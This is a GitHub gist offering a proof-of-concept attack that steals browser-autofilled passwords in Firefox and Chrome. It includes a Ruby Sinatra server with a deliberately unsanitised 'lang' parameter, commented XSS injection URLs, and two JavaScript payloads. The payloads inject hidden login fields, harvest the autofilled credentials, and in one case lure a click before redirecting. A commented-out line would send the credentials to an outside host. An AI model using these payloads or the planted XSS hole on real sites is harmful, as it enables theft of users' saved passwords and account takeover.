Skip to content

Instantly share code, notes, and snippets.

@rasata

rasata/server.rb

Forked from 73696e65/server.rb
Created May 9, 2022 21:24
Show Gist options
  • Save rasata/c94b688a6fa87e91bb255877fa72cd3c to your computer and use it in GitHub Desktop.
Save rasata/c94b688a6fa87e91bb255877fa72cd3c to your computer and use it in GitHub Desktop.
Download ZIP
Autocomplete Password Stealing PoC (FF & Chrome)
Raw
server.rb
#!/usr/bin/env ruby
require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'
# python -m SimpleHTTPServer
# ruby ./server
# http://127.0.0.1:4000/?lang='><script>alert()</script>
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-innerHTML.js"></script>
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-onClick.js"></script><!--
class InjectDemo < Sinatra::Base
get "/login" do
"
<form method='POST' action='/'>
Username: <input id='username' type='text' value='' /><br />
Password: <input id='password' type='password' value='' /><br />
<input type='submit' value='Submit' submit='/' />
</form>
"
end
get "/" do
lang = request['lang'] || "en_US";
"
<div align=center>
To login, go to the login page at
<a href='http://127.0.0.1:4000/login?lang=#{lang}'>http://127.0.0.1/login</a>
</div>
"
end
post "/" do
"
<meta http-equiv='refresh' content='1;url='http://127.0.0.1:4000'>
"
end
end
@routes = {
"/" => InjectDemo.new
}
@rack_app = Rack::URLMap.new(@routes)
@thin = Thin::Server.new("127.0.0.1", 4000, @rack_app)
Thin::Logging.silent = true
Thin::Logging.debug = false
puts "[#{Time.now}] Thin ready"
@thin.start
Raw
stealCreds-innerHTML.js
/* Autocomplete Password Stealing for Firefox */
// Configuration
user_id = "username";
pass_id = "password";
remembered = ''; // Stored UserName
// End of configuration
function stealCreds() {
un = pw = "";
un = document.getElementById(user_id).value;
pw = document.getElementById(pass_id).value;
// new Image().src = "http://example.com/?" + un + "-" + pw;
console.log(un + "-" + pw);
window.clearInterval(check);
}
function appendDiv() {
var div = document.createElement("div");
div.id = 'myform';
div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" +
"<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";
document.getElementsByTagName("body")[0].appendChild(div);
document.getElementById('myform').style.visibility = 'hidden';
}
appendDiv();
check = window.setInterval("stealCreds();", 2000);
Raw
stealCreds-onClick.js
/* Autocomplete Password Stealing for Chrome */
// Configuration
user_id = "username";
pass_id = "password";
remembered = ''; // Stored UserName
message = "<b>Please click here to refresh</b>";
redirect_to = 'http://127.0.0.1:4000'
// End of configuration
function stealCreds() {
un = pw = "";
un = document.getElementById(user_id).value;
pw = document.getElementById(pass_id).value;
// new Image().src = "http://example.com/?" + un + "-" + pw;
console.log(un + "-" + pw);
}
function appendDiv() {
var div = document.createElement("div");
div.id = 'myform';
div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" +
"<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";
document.getElementsByTagName("body")[0].appendChild(div);
document.getElementById('myform').style.visibility = 'hidden';
}
function showMsg() {
var p = document.createElement("p");
p.innerHTML = message;
document.getElementsByTagName("body")[0].appendChild(p);
}
appendDiv();
showMsg();
window.onclick = function() {
stealCreds();
document.location = redirect_to;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment